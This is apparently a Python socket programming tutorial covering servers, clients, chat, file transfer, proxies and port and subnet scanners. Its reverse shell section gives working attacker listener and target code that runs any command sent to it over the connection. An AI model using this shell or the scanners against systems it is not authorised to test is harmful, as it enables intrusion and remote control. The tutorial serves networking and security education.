2117 words
11 minutes
Python Socket Programming - Complete Guide
🐍 Python Socket Programming - Complete Guide

Table of Contents
- What are Sockets?
- Socket Basics
- TCP vs UDP
- Creating a TCP Server
- Creating a TCP Client
- UDP Server and Client
- Port Scanner
- Chat Application
- File Transfer
- Reverse Shell
- HTTP Server
- Socket Options
- Non-blocking Sockets
- Multi-threaded Server
- Practical Projects
1. What are Sockets?

Sockets are endpoints for sending and receiving data across a network.
Think of it like a phone call:
- Server = Person waiting for calls
- Client = Person making the call
- Socket = The phone
- Port = Phone number
Why Learn Sockets?
- ✅ Build network tools
- ✅ Create chat applications
- ✅ Make port scanners
- ✅ Understand how the internet works
- ✅ Security testing & hacking
2. Socket Basics
Import the Module
import socketCreate a Socket
# TCP Socketsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# UDP Socketsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)Parameters Explained
| Parameter | Meaning |
|---|---|
| AF_INET | IPv4 addresses |
| AF_INET6 | IPv6 addresses |
| SOCK_STREAM | TCP (reliable) |
| SOCK_DGRAM | UDP (fast) |
Basic Methods
# Server methodssock.bind((host, port)) # Attach to addresssock.listen(5) # Start listeningsock.accept() # Accept connection
# Client methodssock.connect((host, port)) # Connect to server
# Bothsock.send(data) # Send datasock.recv(1024) # Receive datasock.close() # Close socketGet Your IP Address
import socket
# Get hostnamehostname = socket.gethostname()print(f"Hostname: {hostname}")
# Get IP addressip = socket.gethostbyname(hostname)print(f"IP Address: {ip}")
# Get IP from domaingoogle_ip = socket.gethostbyname("google.com")print(f"Google IP: {google_ip}")3. TCP vs UDP

TCP (Transmission Control Protocol)
- ✅ Reliable - guarantees delivery
- ✅ Ordered - data arrives in sequence
- ✅ Connection-based
- ❌ Slower
- Use for: Web, Email, File transfer
UDP (User Datagram Protocol)
- ✅ Fast
- ✅ No connection needed
- ❌ No guarantee of delivery
- ❌ No order guarantee
- Use for: Gaming, Streaming, DNS
4. Creating a TCP Server

Simple TCP Server
import socket
# Create socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Allow reuse of addressserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind to addressHOST = "0.0.0.0" # Listen on all interfacesPORT = 9999
server.bind((HOST, PORT))
# Start listening (max 5 queued connections)server.listen(5)print(f"[*] Server listening on {HOST}:{PORT}")
# Accept connectionswhile True: client_socket, client_address = server.accept() print(f"[+] Connection from {client_address}")
# Receive data data = client_socket.recv(1024) print(f"[*] Received: {data.decode()}")
# Send response response = "Message received!" client_socket.send(response.encode())
# Close connection client_socket.close()Server with Multiple Messages
import socket
def start_server(host="0.0.0.0", port=9999):
    """Run a blocking TCP echo server that serves one client at a time.

    Each received chunk is decoded, stripped, printed, and echoed back as
    ``Echo: <message>\\n``. A client session ends when the peer closes the
    connection, sends ``quit``, or the connection is reset.

    Args:
        host: Interface address to bind to.
        port: TCP port to listen on.
    """
    # Context managers guarantee both sockets are closed even if an
    # unexpected exception (or Ctrl+C) interrupts the loop.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(5)
        print(f"[*] Server started on {host}:{port}")

        while True:
            client, addr = server.accept()
            print(f"[+] {addr} connected")

            with client:
                while True:
                    try:
                        data = client.recv(1024)
                        if not data:
                            break

                        # errors="replace" keeps a stray non-UTF-8 byte from
                        # crashing the whole server.
                        message = data.decode(errors="replace").strip()
                        print(f"[{addr}] {message}")

                        # sendall() retries until every byte is written;
                        # send() may write only part of the buffer.
                        client.sendall(f"Echo: {message}\n".encode())

                        if message.lower() == "quit":
                            break
                    except (ConnectionResetError, BrokenPipeError):
                        break

            print(f"[-] {addr} disconnected")
if __name__ == "__main__": start_server()
5. Creating a TCP Client
Simple TCP Client
import socket
# Create socketclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to serverHOST = "127.0.0.1"PORT = 9999
client.connect((HOST, PORT))print(f"[*] Connected to {HOST}:{PORT}")
# Send datamessage = "Hello, Server!"client.send(message.encode())
# Receive responseresponse = client.recv(1024)print(f"[*] Response: {response.decode()}")
# Close connectionclient.close()Interactive Client
import socket
def start_client(host="127.0.0.1", port=9999):
    """Connect to a TCP server and relay lines typed by the user.

    Empty input lines are skipped. The session ends when the user types
    ``quit``, standard input reaches EOF, or the server closes or resets
    the connection.

    Args:
        host: Server address to connect to.
        port: Server TCP port.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        client.connect((host, port))
        print(f"[*] Connected to {host}:{port}")
        print("[*] Type 'quit' to exit\n")

        while True:
            try:
                message = input("You: ")
            except EOFError:
                break

            if not message:
                continue

            client.sendall(message.encode())

            if message.lower() == "quit":
                break

            response = client.recv(1024)
            # An empty read means the server closed the connection; without
            # this check the loop would keep printing empty replies.
            if not response:
                print("[!] Server closed the connection")
                break
            print(f"Server: {response.decode(errors='replace')}")

    except ConnectionRefusedError:
        print("[!] Connection refused. Is the server running?")
    except (ConnectionResetError, BrokenPipeError):
        print("[!] Connection lost")
    finally:
        client.close()
        print("[*] Disconnected")
if __name__ == "__main__": start_client()
6. UDP Server and Client
UDP Server
import socket
# Create UDP socketserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = "0.0.0.0"PORT = 9999
server.bind((HOST, PORT))print(f"[*] UDP Server listening on {HOST}:{PORT}")
while True: # Receive data and address data, addr = server.recvfrom(1024) print(f"[{addr}] {data.decode()}")
# Send response response = f"Received: {data.decode()}" server.sendto(response.encode(), addr)UDP Client
import socket
# Create UDP socketclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = "127.0.0.1"PORT = 9999
# Send data (no connection needed!)message = "Hello UDP Server!"client.sendto(message.encode(), (HOST, PORT))
# Receive responsedata, server = client.recvfrom(1024)print(f"Response: {data.decode()}")
client.close()7. Port Scanner

Simple Port Scanner
import socket
def scan_port(host, port):
    """Check whether a TCP port accepts connections.

    Args:
        host: Target hostname or IP address.
        port: TCP port number to probe.

    Returns:
        True if the connection attempt succeeded within 1 second,
        False otherwise.

    Raises:
        socket.gaierror: If ``host`` cannot be resolved (``connect_ex``
            only converts connect-level errors into return codes).
    """
    # The context manager closes the socket even when connect_ex() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)  # 1 second timeout
        return sock.connect_ex((host, port)) == 0  # 0 means connected
# Scan common portstarget = "127.0.0.1"common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389, 8080]
print(f"Scanning {target}...")
for port in common_ports: if scan_port(target, port): print(f"[+] Port {port}: OPEN")Advanced Port Scanner with Threads
import socketimport threadingfrom queue import Queue
# Thread-safe printprint_lock = threading.Lock()
def scan_port(host, port):
    """Probe one TCP port and print a line if it is open.

    Args:
        host: Target hostname or IP address.
        port: TCP port number to probe.

    Raises:
        socket.gaierror: If ``host`` cannot be resolved.
    """
    # Close the socket deterministically, including when connect_ex() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(0.5)
        result = sock.connect_ex((host, port))

    if result != 0:
        return

    # Resolve the service name before taking the lock so other threads are
    # not blocked on the lookup.
    try:
        service = socket.getservbyport(port)
    except OSError:
        # No well-known service is registered for this port.
        service = "unknown"

    with print_lock:
        print(f"[+] Port {port:5} OPEN ({service})")
def worker(host, port_queue):
    """Consume port numbers from the queue forever and scan each one.

    Args:
        host: Target hostname or IP address passed to ``scan_port``.
        port_queue: Queue of port numbers; ``task_done()`` is called once
            per item taken.
    """
    while True:
        port = port_queue.get()
        try:
            scan_port(host, port)
        except OSError as exc:
            # Report and keep going: a dead worker would leave items in the
            # queue and make port_queue.join() block forever.
            with print_lock:
                print(f"[!] Port {port}: {exc}")
        finally:
            # Always mark the item done, even when the scan failed.
            port_queue.task_done()
def port_scanner(host, start_port=1, end_port=1024, threads=100):
    """Scan an inclusive range of TCP ports using a pool of daemon threads.

    Args:
        host: Target hostname or IP address.
        start_port: First port in the range.
        end_port: Last port in the range (inclusive).
        threads: Maximum number of worker threads to start.
    """
    print(f"\n{'='*50}")
    print(f"Scanning {host}")
    print(f"Ports: {start_port} - {end_port}")
    print(f"{'='*50}\n")

    ports = range(start_port, end_port + 1)
    port_queue = Queue()

    # Never start more workers than there are ports to scan; an empty range
    # starts none and join() below returns immediately.
    for _ in range(min(threads, len(ports))):
        t = threading.Thread(target=worker, args=(host, port_queue))
        t.daemon = True  # workers loop forever; let the process exit anyway
        t.start()

    for port in ports:
        port_queue.put(port)

    # Block until every queued port has been marked done.
    port_queue.join()
    print(f"\n{'='*50}")
    print("Scan complete!")
if __name__ == "__main__": target = input("Enter target IP: ") port_scanner(target, 1, 1024)Banner Grabbing Scanner
import socket
def grab_banner(host, port):
    """Connect to a service and return the first data it sends back.

    An HTTP ``HEAD`` request is sent first because some services stay
    silent until they receive input.

    Args:
        host: Target hostname or IP address.
        port: TCP port number.

    Returns:
        The stripped response text (up to 1024 bytes, undecodable bytes
        replaced), or None if connecting, sending, or receiving failed or
        timed out.
    """
    try:
        # The context manager closes the socket on every path, including
        # a failed connect().
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(2)
            sock.connect((host, port))
            sock.sendall(b"HEAD / HTTP/1.1\r\n\r\n")
            return sock.recv(1024).decode(errors="replace").strip()
    except OSError:
        # Covers refused connections, timeouts, and resolution failures,
        # without swallowing KeyboardInterrupt like a bare except would.
        return None
# Scan and grab bannerstarget = "127.0.0.1"ports = [21, 22, 80, 443]
for port in ports: banner = grab_banner(target, port) if banner: print(f"Port {port}:") print(f" {banner[:100]}...") print()8. Chat Application
Chat Server
import socketimport threading
# Connected client sockets and their nicknames, kept index-aligned:
# nicknames[i] belongs to clients[i].
clients = []
nicknames = []


def broadcast(message):
    """Send ``message`` (bytes) to every connected client.

    Clients whose socket fails are removed after the loop, so the list is
    never mutated while it is being iterated and no healthy client is
    skipped.
    """
    failed = []
    for client in list(clients):
        try:
            client.sendall(message)
        except OSError:
            failed.append(client)

    for client in failed:
        remove_client(client)


def remove_client(client):
    """Drop a client from the registry, close it, and announce the departure.

    Does nothing if the client has already been removed.
    """
    if client not in clients:
        return

    index = clients.index(client)
    clients.pop(index)
    # Pop by index rather than by value so a duplicate nickname does not
    # remove another client's entry.
    nickname = nicknames.pop(index)

    try:
        client.close()
    except OSError:
        pass  # already closed; nothing left to release

    broadcast(f"[SERVER] {nickname} left the chat!".encode())


def handle_client(client):
    """Relay everything one client sends to all clients until it disconnects."""
    while True:
        try:
            message = client.recv(1024)
        except OSError:
            break
        if not message:
            # Empty read: the peer closed the connection.
            break
        broadcast(message)

    remove_client(client)
def start_server():
    """Run the chat server on port 9999, one handler thread per client.

    Each new connection is asked for a nickname with a ``NICK`` prompt,
    registered in ``clients``/``nicknames``, announced to everyone, and
    then served by ``handle_client`` in its own thread.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", 9999))
        server.listen(10)

        print("[*] Chat Server started on port 9999")

        while True:
            client, address = server.accept()
            print(f"[+] {address} connected")

            # A client that drops during the handshake must not take the
            # accept loop down with it.
            try:
                client.sendall("NICK".encode())
                nickname = client.recv(1024).decode(errors="replace")
            except OSError:
                nickname = ""
            if not nickname:
                client.close()
                continue

            nicknames.append(nickname)
            clients.append(client)

            print(f"[*] Nickname: {nickname}")
            broadcast(f"[SERVER] {nickname} joined the chat!".encode())
            try:
                client.sendall("[SERVER] Connected to chat!".encode())
            except OSError:
                # The handler thread will see the dead socket on its first
                # recv() and unregister the client.
                pass

            # Daemon threads do not keep the process alive after Ctrl+C.
            thread = threading.Thread(
                target=handle_client, args=(client,), daemon=True
            )
            thread.start()
if __name__ == "__main__": start_server()
Chat Client
import socketimport threading
nickname = input("Enter nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)client.connect(("127.0.0.1", 9999))
def receive():
    """Print incoming chat messages until the connection ends.

    Answers the server's ``NICK`` prompt with the module-level
    ``nickname``. Stops and closes the socket when the server closes the
    connection or a socket error occurs.
    """
    while True:
        try:
            data = client.recv(1024)
            if not data:
                # Empty read means the server closed the connection; without
                # this the loop would spin forever printing empty lines.
                raise ConnectionError("connection closed by server")

            message = data.decode(errors="replace")
            if message == "NICK":
                client.sendall(nickname.encode())
            else:
                print(message)
        except OSError:
            print("[!] Connection lost!")
            client.close()
            break
def write():
    """Read lines from the user and send them to the chat server.

    Each line is sent as ``[<nickname>] <message>``. Typing ``/quit`` (or
    reaching end of input) closes the socket and stops the loop.
    """
    while True:
        try:
            message = input("")
        except EOFError:
            message = "/quit"

        if message.lower() == "/quit":
            client.close()
            break

        try:
            client.sendall(f"[{nickname}] {message}".encode())
        except OSError:
            # The receive thread already closed the socket after a lost
            # connection; nothing more can be sent.
            break
# Start threadsreceive_thread = threading.Thread(target=receive)receive_thread.start()
write_thread = threading.Thread(target=write)write_thread.start()9. File Transfer
File Server (Sender)
import socketimport os
def send_file(filename, host="0.0.0.0", port=9999):
    """Wait for one TCP client and send it a file.

    Protocol: send the file's base name, wait for an acknowledgment, send
    the size in bytes as decimal text, wait for an acknowledgment, then
    stream the file contents.

    Args:
        filename: Path of the file to send.
        host: Interface address to bind to.
        port: TCP port to listen on.

    Raises:
        OSError: If the file cannot be read or a socket operation fails.
    """
    # Fail on a missing file before opening any socket.
    filesize = os.path.getsize(filename)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(1)

        print(f"[*] Waiting for connection on port {port}...")

        client, addr = server.accept()
        with client:
            print(f"[+] {addr} connected")

            # Send only the base name: the receiver has no use for the
            # sender's directory layout.
            client.sendall(os.path.basename(filename).encode())
            client.recv(1024)  # wait for acknowledgment

            client.sendall(str(filesize).encode())
            client.recv(1024)  # wait for acknowledgment

            bytes_sent = 0
            with open(filename, "rb") as f:
                while bytes_sent < filesize:
                    # Never send more than the announced size.
                    data = f.read(min(4096, filesize - bytes_sent))
                    if not data:
                        # File shrank after its size was measured; stop
                        # instead of looping forever.
                        break
                    # sendall() writes the whole chunk, so len(data) is the
                    # true number of bytes sent.
                    client.sendall(data)
                    bytes_sent += len(data)
                    print(f"\r[*] Sent: {bytes_sent}/{filesize} bytes", end="")

    if bytes_sent < filesize:
        print(f"\n[!] File truncated: sent {bytes_sent}/{filesize} bytes")
    else:
        print("\n[+] File sent successfully!")
if __name__ == "__main__": send_file("test.txt")
File Client (Receiver)
import socket
def receive_file(host="127.0.0.1", port=9999):
    """Connect to a file server and save the file it sends.

    Protocol: receive the filename and reply ``OK``, receive the size in
    bytes as decimal text and reply ``OK``, then read that many bytes.
    The file is written to ``received_<name>`` in the current directory.

    Args:
        host: Server address to connect to.
        port: Server TCP port.

    Raises:
        ValueError: If the announced file size is not an integer.
        OSError: If a socket or file operation fails.
    """
    # Local import: this listing's import block only brings in socket.
    import os

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.connect((host, port))

        print(f"[*] Connected to {host}:{port}")

        # The name comes from the remote side, so strip any directory part
        # (either separator style) to keep the write inside the current
        # directory.
        raw_name = client.recv(1024).decode()
        filename = os.path.basename(raw_name.replace("\\", "/"))
        print(f"[*] Receiving: {filename}")
        client.sendall(b"OK")

        filesize = int(client.recv(1024).decode())
        print(f"[*] File size: {filesize} bytes")
        client.sendall(b"OK")

        bytes_received = 0
        with open(f"received_{filename}", "wb") as f:
            while bytes_received < filesize:
                data = client.recv(min(4096, filesize - bytes_received))
                if not data:
                    # Sender disconnected early; an empty read would
                    # otherwise repeat forever.
                    break
                f.write(data)
                bytes_received += len(data)
                print(
                    f"\r[*] Received: {bytes_received}/{filesize} bytes",
                    end="",
                )

    if bytes_received < filesize:
        print(f"\n[!] Transfer incomplete: {bytes_received}/{filesize} bytes")
    else:
        print(f"\n[+] File saved as: received_{filename}")
if __name__ == "__main__": receive_file()
10. Reverse Shell
⚠️ WARNING: For educational purposes only! Only use on systems you own or have permission to test.
Reverse Shell Server (Attacker)
import socket
def start_listener(host="0.0.0.0", port=4444): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((host, port)) server.listen(1)
print(f"[*] Listening on {host}:{port}")
client, addr = server.accept() print(f"[+] Connection from {addr}")
while True: command = input("Shell> ")
if command.lower() == "exit": client.send(b"exit") break
if not command: continue
client.send(command.encode())
response = client.recv(65535).decode() print(response)
client.close() server.close()
if __name__ == "__main__": start_listener()Reverse Shell Client (Target)
import socketimport subprocessimport os
def connect_back(host="127.0.0.1", port=4444): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host, port))
while True: command = client.recv(1024).decode()
if command.lower() == "exit": break
# Handle cd command if command.startswith("cd "): try: os.chdir(command[3:]) output = f"Changed to: {os.getcwd()}" except: output = "Directory not found" else: # Execute command try: output = subprocess.check_output( command, shell=True, stderr=subprocess.STDOUT ).decode() except Exception as e: output = str(e)
if not output: output = "Command executed (no output)"
client.send(output.encode())
client.close()
if __name__ == "__main__": connect_back()11. HTTP Server
Simple HTTP Server
import socket
def http_server(host="0.0.0.0", port=8080):
    """Serve a single HTML page that echoes the requested path.

    Handles one connection at a time: reads up to 4096 bytes of the
    request, takes the method and path from the first two
    whitespace-separated tokens, and answers ``200 OK`` with a small page.
    Requests with fewer than two tokens are dropped without a response.

    Args:
        host: Interface address to bind to.
        port: TCP port to listen on.
    """
    # Local import: this listing's import block only brings in socket.
    from html import escape

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(5)

        print(f"[*] HTTP Server running on http://{host}:{port}")

        while True:
            client, addr = server.accept()

            # `with` closes the client on every path, including `continue`.
            with client:
                try:
                    request = client.recv(4096).decode(errors="replace")
                except OSError:
                    continue

                tokens = request.split()
                if len(tokens) < 2:
                    # Empty or malformed request line: no path to report.
                    continue
                method, path = tokens[0], tokens[1]
                print(f"[{addr[0]}] {method} {path}")

                # The path is attacker-controlled; escape it before placing
                # it in the page.
                page = """<!DOCTYPE html>
<html>
<head><title>Python HTTP Server</title></head>
<body>
    <h1>Hello from Python!</h1>
    <p>You requested: {}</p>
</body>
</html>""".format(escape(path))

                # Content-Length must count bytes, not characters.
                body = page.encode()
                headers = (
                    "HTTP/1.1 200 OK\r\n"
                    "Content-Type: text/html; charset=utf-8\r\n"
                    f"Content-Length: {len(body)}\r\n"
                    "Connection: close\r\n"
                    "\r\n"
                )

                try:
                    client.sendall(headers.encode() + body)
                except OSError:
                    continue
if __name__ == "__main__": http_server()
12. Socket Options
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Reuse address (avoid "Address already in use")sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Set timeout (seconds)sock.settimeout(5.0)
# Keep connection alivesock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# Set buffer sizessock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 8192) # Receive buffersock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 8192) # Send buffer
# Disable Nagle's algorithm (send immediately)sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Get option valuevalue = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)print(f"Receive buffer size: {value}")13. Non-blocking Sockets
Using select()
import socketimport select
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)server.setblocking(False)server.bind(("0.0.0.0", 9999))server.listen(5)
sockets_list = [server]clients = {}
print("[*] Non-blocking server started")
while True: # Wait for activity on any socket read_sockets, _, exception_sockets = select.select( sockets_list, [], sockets_list )
for sock in read_sockets: # New connection if sock == server: client, addr = server.accept() client.setblocking(False) sockets_list.append(client) clients[client] = addr print(f"[+] {addr} connected")
# Message from client else: try: data = sock.recv(1024) if data: print(f"[{clients[sock]}] {data.decode()}") # Broadcast to others for client in clients: if client != sock: client.send(data) else: # Client disconnected print(f"[-] {clients[sock]} disconnected") sockets_list.remove(sock) del clients[sock] except: continue
# Handle exceptions for sock in exception_sockets: sockets_list.remove(sock) del clients[sock]14. Multi-threaded Server
import socketimport threading
class ClientThread(threading.Thread):
    """Thread that echoes back everything one connected client sends."""

    def __init__(self, client_socket, client_address):
        """Store the connection to serve.

        Args:
            client_socket: Connected socket for this client.
            client_address: Peer address, used only in log output.
        """
        super().__init__()
        self.client = client_socket
        self.address = client_address

    def run(self):
        """Echo received data as ``Echo: <message>`` until the peer disconnects."""
        print(f"[+] Thread started for {self.address}")

        try:
            while True:
                data = self.client.recv(1024)
                if not data:
                    break

                # Replace undecodable bytes instead of killing the thread.
                message = data.decode(errors="replace")
                print(f"[{self.address}] {message}")

                # sendall() writes the full reply; send() may stop short.
                self.client.sendall(f"Echo: {message}".encode())
        except (ConnectionResetError, BrokenPipeError):
            pass  # peer went away mid-conversation; fall through to cleanup
        finally:
            # Runs on every exit path so the socket is never leaked.
            print(f"[-] {self.address} disconnected")
            self.client.close()
def main():
    """Accept connections on port 9999 and serve each in a ClientThread."""
    # The context manager releases the listening port when the loop is
    # interrupted (e.g. Ctrl+C) or accept() fails.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", 9999))
        server.listen(10)

        print("[*] Multi-threaded server started on port 9999")

        while True:
            client, addr = server.accept()
            ClientThread(client, addr).start()
if __name__ == "__main__": main()
15. Practical Projects
Project 1: Network Discovery Tool
import socketimport threadingfrom queue import Queue
def scan_host(ip):
    """Report a host as alive if it accepts a TCP connection on port 80.

    Hosts that are up but do not listen on port 80 are not reported.

    Args:
        ip: IPv4 address to probe.
    """
    # Close the socket deterministically, even if connect_ex() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(0.5)
        result = sock.connect_ex((ip, 80))

    if result != 0:
        return

    try:
        hostname = socket.gethostbyaddr(ip)[0]
    except OSError:
        # No reverse DNS entry (socket.herror / gaierror are OSError).
        hostname = "Unknown"
    print(f"[+] {ip:15} - ALIVE ({hostname})")
def network_scan(network="192.168.1"):
    """Probe hosts .1 through .254 of a /24 network concurrently.

    Args:
        network: First three octets of the network, e.g. ``"192.168.1"``.
    """
    print(f"[*] Scanning {network}.0/24\n")

    # One thread per host address; each runs scan_host on its own IP.
    probes = [
        threading.Thread(target=scan_host, args=(f"{network}.{last_octet}",))
        for last_octet in range(1, 255)
    ]

    for probe in probes:
        probe.start()

    # Wait for every probe to finish before returning.
    for probe in probes:
        probe.join()
if __name__ == "__main__": network_scan("192.168.1")
Project 2: DNS Lookup Tool
import socket
def dns_lookup(domain):
    """Print the addresses a domain name resolves to.

    Prints the single IPv4 address from ``gethostbyname`` first, then every
    distinct IPv4 and IPv6 address returned by ``getaddrinfo``.

    Args:
        domain: Hostname to resolve.
    """
    print(f"\n[*] DNS Lookup for: {domain}\n")

    # A record (IPv4)
    try:
        ipv4 = socket.gethostbyname(domain)
        print(f"IPv4 (A): {ipv4}")
    except OSError:
        # Resolution failures are OSError subclasses; a bare except would
        # also have hidden KeyboardInterrupt.
        print("IPv4: Not found")

    # All addresses
    try:
        results = socket.getaddrinfo(domain, None)
    except socket.gaierror as e:
        print(f"Error: {e}")
        return

    # Each result is (family, type, proto, canonname, sockaddr) and
    # sockaddr[0] is the address; sets remove per-socket-type duplicates.
    ipv4_addrs = {r[4][0] for r in results if r[0] == socket.AF_INET}
    ipv6_addrs = {r[4][0] for r in results if r[0] == socket.AF_INET6}

    # Sorted so the output order is stable between runs.
    print("\nAll IPv4 addresses:")
    for addr in sorted(ipv4_addrs):
        print(f" - {addr}")

    print("\nAll IPv6 addresses:")
    for addr in sorted(ipv6_addrs):
        print(f" - {addr}")
# Testdns_lookup("google.com")dns_lookup("github.com")Project 3: Simple Proxy Server
import socketimport threading
def _parse_target(request):
    """Return (host, port) from a raw HTTP request's first line, or None if malformed."""
    tokens = request.split(b"\n", 1)[0].split()
    if len(tokens) < 2:
        return None
    url = tokens[1]

    # Drop the scheme ("http://") if present.
    scheme_end = url.find(b"://")
    if scheme_end != -1:
        url = url[scheme_end + 3:]

    # Everything before the first "/" is host[:port].
    path_start = url.find(b"/")
    authority = url if path_start == -1 else url[:path_start]

    host, colon, port_text = authority.partition(b":")
    if not host:
        return None
    try:
        port = int(port_text) if colon else 80
        return host.decode("ascii"), port
    except (ValueError, UnicodeDecodeError):
        return None


def handle_client(client_socket):
    """Forward one HTTP request to its destination and relay the response.

    Reads up to 4096 bytes from the client, extracts the destination host
    and port from the request line (port defaults to 80), sends the request
    there unchanged, and copies the response back until the destination
    closes. The client socket is always closed before returning.

    Args:
        client_socket: Connected socket of the proxy client.
    """
    try:
        request = client_socket.recv(4096)

        target = _parse_target(request)
        if target is None:
            # Empty or unparsable request line: nothing to forward.
            print("Error: malformed request")
            return

        # The context manager closes the destination socket even when
        # connect() or a relay step fails.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as dest:
            dest.connect(target)
            dest.sendall(request)

            while True:
                data = dest.recv(4096)
                if not data:
                    break
                client_socket.sendall(data)
    except OSError as e:
        print(f"Error: {e}")
    finally:
        client_socket.close()
def proxy_server(host="0.0.0.0", port=8888):
    """Accept proxy clients and handle each one in its own thread.

    Args:
        host: Interface address to bind to.
        port: TCP port to listen on.
    """
    # The context manager releases the listening port when the loop is
    # interrupted (e.g. Ctrl+C) or accept() fails.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(10)

        print(f"[*] Proxy server running on {host}:{port}")

        while True:
            client, addr = server.accept()
            print(f"[+] Request from {addr}")
            thread = threading.Thread(target=handle_client, args=(client,))
            thread.start()
if __name__ == "__main__": proxy_server()
🎯 Quick Reference
| Function | Description |
|---|---|
| socket() | Create a socket |
| bind() | Bind to address |
| listen() | Start listening |
| accept() | Accept connection |
| connect() | Connect to server |
| send() | Send data |
| recv() | Receive data |
| close() | Close socket |
| settimeout() | Set timeout |
| gethostname() | Get local hostname |
| gethostbyname() | Resolve hostname |
🎉 You’re Now a Socket Master!
Practice by building:
- Port scanners
- Chat applications
- File transfer tools
- Network utilities
- Security tools
Created by cat0x01 🥷🏻